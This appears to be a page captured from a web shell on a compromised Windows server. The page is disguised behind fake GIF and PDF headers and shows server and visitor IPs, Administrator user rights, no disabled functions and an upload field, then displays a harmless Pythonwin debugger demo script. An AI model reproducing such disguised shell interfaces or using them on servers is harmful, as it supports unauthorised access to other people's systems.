GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Program Files (x86)/Certbot/pkgs/pythonwin/pywin/debugger/ |
Upload File : |
# NOTE NOTE - This module is designed to fail! # # The ONLY purpose for this script is testing/demoing the # Pythonwin debugger package. # It does nothing useful, and it even doesnt do that! import pywin.debugger, sys, time import traceback def a(): a=1 try: b() except: # Break into the debugger with the exception information. pywin.debugger.post_mortem(sys.exc_info()[2]) a=1 a=2 a=3 a=4 pass def b(): b=1 pywin.debugger.set_trace() # After importing or running this module, you are likely to be # sitting at the next line. This is because we explicitely # broke into the debugger using the "set_trace() function # "pywin.debugger.brk()" is a shorter alias for this. c() pass def c(): c=1 d() def d(): d=1 e(d) raise ValueError("Hi") def e(arg): e=1 time.sleep(1) return e a()